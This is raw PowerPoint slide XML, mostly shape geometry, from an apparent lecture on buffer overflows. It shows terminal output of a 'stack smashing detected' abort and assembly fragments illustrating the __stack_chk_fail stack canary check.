                  <a:pt x="5045651" y="1982000"/>
                  <a:pt x="4893418" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4741185" y="1988732"/>
                  <a:pt x="4528569" y="1964423"/>
                  <a:pt x="4260369" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3992169" y="2006309"/>
                  <a:pt x="3740173" y="1919037"/>
                  <a:pt x="3564585" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3388997" y="2051695"/>
                  <a:pt x="3214625" y="1933243"/>
                  <a:pt x="2931536" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2648447" y="2037489"/>
                  <a:pt x="2418025" y="1962459"/>
                  <a:pt x="2235752" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2053479" y="2008273"/>
                  <a:pt x="1878492" y="1938500"/>
                  <a:pt x="1602703" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1326914" y="2032232"/>
                  <a:pt x="1324345" y="1940296"/>
                  <a:pt x="1157857" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="991369" y="2030436"/>
                  <a:pt x="663276" y="1915413"/>
                  <a:pt x="330901" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160873" y="1987326"/>
                  <a:pt x="26551" y="1877953"/>
                  <a:pt x="0" y="1654465"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-53031" y="1550113"/>
                  <a:pt x="26345" y="1295024"/>
                  <a:pt x="0" y="1200041"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-26345" y="1105058"/>
                  <a:pt x="2066" y="879660"/>
                  <a:pt x="0" y="785325"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-2066" y="690990"/>
                  <a:pt x="31159" y="533409"/>
                  <a:pt x="0" y="330901"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="6935263" h="1985366" stroke="0" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="330901"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="-21300" y="135010"/>
                  <a:pt x="104468" y="16394"/>
                  <a:pt x="330901" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="666146" y="-49002"/>
                  <a:pt x="718466" y="57821"/>
                  <a:pt x="1026685" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1334904" y="-57821"/>
                  <a:pt x="1422046" y="27094"/>
                  <a:pt x="1534265" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1646484" y="-27094"/>
                  <a:pt x="1770141" y="4968"/>
                  <a:pt x="1979110" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2188080" y="-4968"/>
                  <a:pt x="2424764" y="51257"/>
                  <a:pt x="2612160" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2799556" y="-51257"/>
                  <a:pt x="2934266" y="17839"/>
                  <a:pt x="3119740" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3305214" y="-17839"/>
                  <a:pt x="3613300" y="56856"/>
                  <a:pt x="3815523" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4017746" y="-56856"/>
                  <a:pt x="4082288" y="11836"/>
                  <a:pt x="4260369" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4438450" y="-11836"/>
                  <a:pt x="4670901" y="69038"/>
                  <a:pt x="4956153" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5241405" y="-69038"/>
                  <a:pt x="5148681" y="272"/>
                  <a:pt x="5338264" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5527847" y="-272"/>
                  <a:pt x="5700670" y="9430"/>
                  <a:pt x="5908578" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6116486" y="-9430"/>
                  <a:pt x="6349684" y="52316"/>
                  <a:pt x="6604362" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6817994" y="-30515"/>
                  <a:pt x="6976625" y="121478"/>
                  <a:pt x="6935263" y="330901"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6963233" y="517036"/>
                  <a:pt x="6925117" y="555805"/>
                  <a:pt x="6935263" y="772089"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6945409" y="988373"/>
                  <a:pt x="6932057" y="1031670"/>
                  <a:pt x="6935263" y="1186806"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6938469" y="1341942"/>
                  <a:pt x="6881326" y="1553025"/>
                  <a:pt x="6935263" y="1654465"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6922445" y="1811088"/>
                  <a:pt x="6790431" y="1940495"/>
                  <a:pt x="6604362" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6397626" y="2010181"/>
                  <a:pt x="6225864" y="1933133"/>
                  <a:pt x="5971313" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5716762" y="2037599"/>
                  <a:pt x="5670373" y="1941892"/>
                  <a:pt x="5526467" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5382561" y="2028840"/>
                  <a:pt x="5097762" y="1911954"/>
                  <a:pt x="4830683" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4563604" y="2058778"/>
                  <a:pt x="4393649" y="1934127"/>
                  <a:pt x="4260369" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4127089" y="2036605"/>
                  <a:pt x="3986644" y="1944342"/>
                  <a:pt x="3815523" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3644402" y="2026390"/>
                  <a:pt x="3482736" y="1948031"/>
                  <a:pt x="3245209" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3007682" y="2022701"/>
                  <a:pt x="2995311" y="1978616"/>
                  <a:pt x="2863098" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2730885" y="1992116"/>
                  <a:pt x="2642494" y="1942004"/>
                  <a:pt x="2480987" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2319480" y="2028728"/>
                  <a:pt x="2193233" y="1926884"/>
                  <a:pt x="1910673" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1628113" y="2043848"/>
                  <a:pt x="1622411" y="1985023"/>
                  <a:pt x="1465827" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1309243" y="1985709"/>
                  <a:pt x="973313" y="1981109"/>
                  <a:pt x="832778" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="692243" y="1989623"/>
                  <a:pt x="520796" y="1972351"/>
                  <a:pt x="330901" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="141759" y="2005287"/>
                  <a:pt x="-6142" y="1817876"/>
                  <a:pt x="0" y="1654465"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-37043" y="1465497"/>
                  <a:pt x="48882" y="1354599"/>
                  <a:pt x="0" y="1213277"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-48882" y="1071955"/>
                  <a:pt x="20055" y="950395"/>
                  <a:pt x="0" y="798560"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-20055" y="646725"/>
                  <a:pt x="13033" y="517708"/>
                  <a:pt x="0" y="330901"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="38100">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0x7ffe41c142c0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>abcdefghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>abcdefghi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stack smashing detected ***: &lt;unknown&gt; terminated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Abort (core dumped)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375870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0DEB75D-F27F-1C41-9B3F-A0A65D24A5AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detecting Buffer Overflow</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03FC1476-1F63-034D-B5C5-082379182992}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6684893" y="1212898"/>
            <a:ext cx="4680857" cy="564510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xorl</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endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC0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$.LC1,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$.LC2,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$0, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printf</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gets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jne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     .L6</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ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.L6:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    call    __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stack_chk_fail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rounded Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D8659BA-3618-9844-B401-95CF01317307}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5256737" y="2677324"/>
            <a:ext cx="6935263" cy="1985366"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6935263"/>
              <a:gd name="connsiteY0" fmla="*/ 330901 h 1985366"/>
              <a:gd name="connsiteX1" fmla="*/ 330901 w 6935263"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX2" fmla="*/ 775746 w 6935263"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX3" fmla="*/ 1157857 w 6935263"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX4" fmla="*/ 1602703 w 6935263"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX5" fmla="*/ 2110283 w 6935263"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX6" fmla="*/ 2680597 w 6935263"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX7" fmla="*/ 3125443 w 6935263"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX8" fmla="*/ 3821227 w 6935263"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX9" fmla="*/ 4391541 w 6935263"/>
              <a:gd name="connsiteY9" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX10" fmla="*/ 5087325 w 6935263"/>
              <a:gd name="connsiteY10" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX11" fmla="*/ 5720374 w 6935263"/>
              <a:gd name="connsiteY11" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX12" fmla="*/ 6604362 w 6935263"/>
              <a:gd name="connsiteY12" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX13" fmla="*/ 6935263 w 6935263"/>
              <a:gd name="connsiteY13" fmla="*/ 330901 h 1985366"/>
              <a:gd name="connsiteX14" fmla="*/ 6935263 w 6935263"/>
              <a:gd name="connsiteY14" fmla="*/ 758853 h 1985366"/>
              <a:gd name="connsiteX15" fmla="*/ 6935263 w 6935263"/>
              <a:gd name="connsiteY15" fmla="*/ 1160334 h 1985366"/>
              <a:gd name="connsiteX16" fmla="*/ 6935263 w 6935263"/>
              <a:gd name="connsiteY16" fmla="*/ 1654465 h 1985366"/>
              <a:gd name="connsiteX17" fmla="*/ 6604362 w 6935263"/>
              <a:gd name="connsiteY17" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX18" fmla="*/ 5908578 w 6935263"/>
              <a:gd name="connsiteY18" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX19" fmla="*/ 5463733 w 6935263"/>
              <a:gd name="connsiteY19" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX20" fmla="*/ 4893418 w 6935263"/>
              <a:gd name="connsiteY20" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX21" fmla="*/ 4260369 w 6935263"/>
              <a:gd name="connsiteY21" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX22" fmla="*/ 3564585 w 6935263"/>
              <a:gd name="connsiteY22" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX23" fmla="*/ 2931536 w 6935263"/>
              <a:gd name="connsiteY23" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX24" fmla="*/ 2235752 w 6935263"/>
              <a:gd name="connsiteY24" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX25" fmla="*/ 1602703 w 6935263"/>
              <a:gd name="connsiteY25" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX26" fmla="*/ 1157857 w 6935263"/>
              <a:gd name="connsiteY26" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX27" fmla="*/ 330901 w 6935263"/>
              <a:gd name="connsiteY27" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX28" fmla="*/ 0 w 6935263"/>
              <a:gd name="connsiteY28" fmla="*/ 1654465 h 1985366"/>
              <a:gd name="connsiteX29" fmla="*/ 0 w 6935263"/>
              <a:gd name="connsiteY29" fmla="*/ 1200041 h 1985366"/>
              <a:gd name="connsiteX30" fmla="*/ 0 w 6935263"/>
              <a:gd name="connsiteY30" fmla="*/ 785325 h 1985366"/>
              <a:gd name="connsiteX31" fmla="*/ 0 w 6935263"/>
              <a:gd name="connsiteY31" fmla="*/ 330901 h 198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35263" h="1985366" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="330901"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3476" y="132976"/>
                  <a:pt x="131627" y="-532"/>
                  <a:pt x="330901" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="464491" y="-46664"/>
                  <a:pt x="608229" y="48684"/>
                  <a:pt x="775746" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="943264" y="-48684"/>
                  <a:pt x="1020233" y="31838"/>
                  <a:pt x="1157857" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1295481" y="-31838"/>
                  <a:pt x="1393496" y="14476"/>
                  <a:pt x="1602703" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1811910" y="-14476"/>
                  <a:pt x="1992314" y="48941"/>
                  <a:pt x="2110283" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2228252" y="-48941"/>
                  <a:pt x="2499887" y="50706"/>
                  <a:pt x="2680597" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2861307" y="-50706"/>
                  <a:pt x="2929604" y="49464"/>
                  <a:pt x="3125443" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3321282" y="-49464"/>
                  <a:pt x="3531058" y="24405"/>
                  <a:pt x="3821227" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4111396" y="-24405"/>
                  <a:pt x="4215765" y="15266"/>
                  <a:pt x="4391541" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4567317" y="-15266"/>
                  <a:pt x="4896808" y="24543"/>
                  <a:pt x="5087325" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5277842" y="-24543"/>
                  <a:pt x="5441526" y="27639"/>
                  <a:pt x="5720374" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5999222" y="-27639"/>
                  <a:pt x="6377898" y="27360"/>
                  <a:pt x="6604362" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6811769" y="4227"/>
                  <a:pt x="6903459" y="159785"/>
                  <a:pt x="6935263" y="330901"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6947249" y="469426"/>
                  <a:pt x="6929529" y="637266"/>
                  <a:pt x="6935263" y="758853"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6940997" y="880440"/>
                  <a:pt x="6888838" y="1042861"/>
                  <a:pt x="6935263" y="1160334"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6981688" y="1277807"/>
                  <a:pt x="6920201" y="1462150"/>
                  <a:pt x="6935263" y="1654465"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6946448" y="1797930"/>
                  <a:pt x="6769918" y="1954799"/>
                  <a:pt x="6604362" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6355689" y="2034516"/>
                  <a:pt x="6141624" y="1982336"/>
                  <a:pt x="5908578" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5675532" y="1988396"/>
                  <a:pt x="5585775" y="1961469"/>
                  <a:pt x="5463733" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5341691" y="2009263"/>
                  <a:pt x="5045651" y="1982000"/>
                  <a:pt x="4893418" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4741185" y="1988732"/>
                  <a:pt x="4528569" y="1964423"/>
                  <a:pt x="4260369" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3992169" y="2006309"/>
                  <a:pt x="3740173" y="1919037"/>
                  <a:pt x="3564585" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3388997" y="2051695"/>
                  <a:pt x="3214625" y="1933243"/>
                  <a:pt x="2931536" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2648447" y="2037489"/>
                  <a:pt x="2418025" y="1962459"/>
                  <a:pt x="2235752" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2053479" y="2008273"/>
                  <a:pt x="1878492" y="1938500"/>
                  <a:pt x="1602703" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1326914" y="2032232"/>
                  <a:pt x="1324345" y="1940296"/>
                  <a:pt x="1157857" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="991369" y="2030436"/>
                  <a:pt x="663276" y="1915413"/>
                  <a:pt x="330901" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160873" y="1987326"/>
                  <a:pt x="26551" y="1877953"/>
                  <a:pt x="0" y="1654465"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-53031" y="1550113"/>
                  <a:pt x="26345" y="1295024"/>
                  <a:pt x="0" y="1200041"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-26345" y="1105058"/>
                  <a:pt x="2066" y="879660"/>
                  <a:pt x="0" y="785325"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-2066" y="690990"/>
                  <a:pt x="31159" y="533409"/>
                  <a:pt x="0" y="330901"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="6935263" h="1985366" stroke="0" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="330901"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="-21300" y="135010"/>
                  <a:pt x="104468" y="16394"/>
                  <a:pt x="330901" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="666146" y="-49002"/>
                  <a:pt x="718466" y="57821"/>
                  <a:pt x="1026685" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1334904" y="-57821"/>
                  <a:pt x="1422046" y="27094"/>
                  <a:pt x="1534265" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1646484" y="-27094"/>
                  <a:pt x="1770141" y="4968"/>
                  <a:pt x="1979110" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2188080" y="-4968"/>
                  <a:pt x="2424764" y="51257"/>
                  <a:pt x="2612160" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2799556" y="-51257"/>
                  <a:pt x="2934266" y="17839"/>
                  <a:pt x="3119740" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3305214" y="-17839"/>
                  <a:pt x="3613300" y="56856"/>
                  <a:pt x="3815523" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4017746" y="-56856"/>
                  <a:pt x="4082288" y="11836"/>
                  <a:pt x="4260369" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4438450" y="-11836"/>
                  <a:pt x="4670901" y="69038"/>
                  <a:pt x="4956153" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5241405" y="-69038"/>
                  <a:pt x="5148681" y="272"/>
                  <a:pt x="5338264" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5527847" y="-272"/>
                  <a:pt x="5700670" y="9430"/>
                  <a:pt x="5908578" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6116486" y="-9430"/>
                  <a:pt x="6349684" y="52316"/>
                  <a:pt x="6604362" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6817994" y="-30515"/>
                  <a:pt x="6976625" y="121478"/>
                  <a:pt x="6935263" y="330901"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6963233" y="517036"/>
                  <a:pt x="6925117" y="555805"/>
                  <a:pt x="6935263" y="772089"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6945409" y="988373"/>
                  <a:pt x="6932057" y="1031670"/>
                  <a:pt x="6935263" y="1186806"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6938469" y="1341942"/>
                  <a:pt x="6881326" y="1553025"/>
                  <a:pt x="6935263" y="1654465"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6922445" y="1811088"/>
                  <a:pt x="6790431" y="1940495"/>
                  <a:pt x="6604362" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6397626" y="2010181"/>
                  <a:pt x="6225864" y="1933133"/>
                  <a:pt x="5971313" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5716762" y="2037599"/>
                  <a:pt x="5670373" y="1941892"/>
                  <a:pt x="5526467" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5382561" y="2028840"/>
                  <a:pt x="5097762" y="1911954"/>
                  <a:pt x="4830683" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4563604" y="2058778"/>
                  <a:pt x="4393649" y="1934127"/>
                  <a:pt x="4260369" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4127089" y="2036605"/>
                  <a:pt x="3986644" y="1944342"/>
                  <a:pt x="3815523" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3644402" y="2026390"/>
                  <a:pt x="3482736" y="1948031"/>
                  <a:pt x="3245209" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3007682" y="2022701"/>
                  <a:pt x="2995311" y="1978616"/>
                  <a:pt x="2863098" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2730885" y="1992116"/>
                  <a:pt x="2642494" y="1942004"/>
                  <a:pt x="2480987" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2319480" y="2028728"/>
                  <a:pt x="2193233" y="1926884"/>
                  <a:pt x="1910673" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1628113" y="2043848"/>
                  <a:pt x="1622411" y="1985023"/>
                  <a:pt x="1465827" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1309243" y="1985709"/>
                  <a:pt x="973313" y="1981109"/>
                  <a:pt x="832778" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="692243" y="1989623"/>
                  <a:pt x="520796" y="1972351"/>
                  <a:pt x="330901" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="141759" y="2005287"/>
                  <a:pt x="-6142" y="1817876"/>
                  <a:pt x="0" y="1654465"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-37043" y="1465497"/>
                  <a:pt x="48882" y="1354599"/>
                  <a:pt x="0" y="1213277"/>
                </a:cubicBezTo>
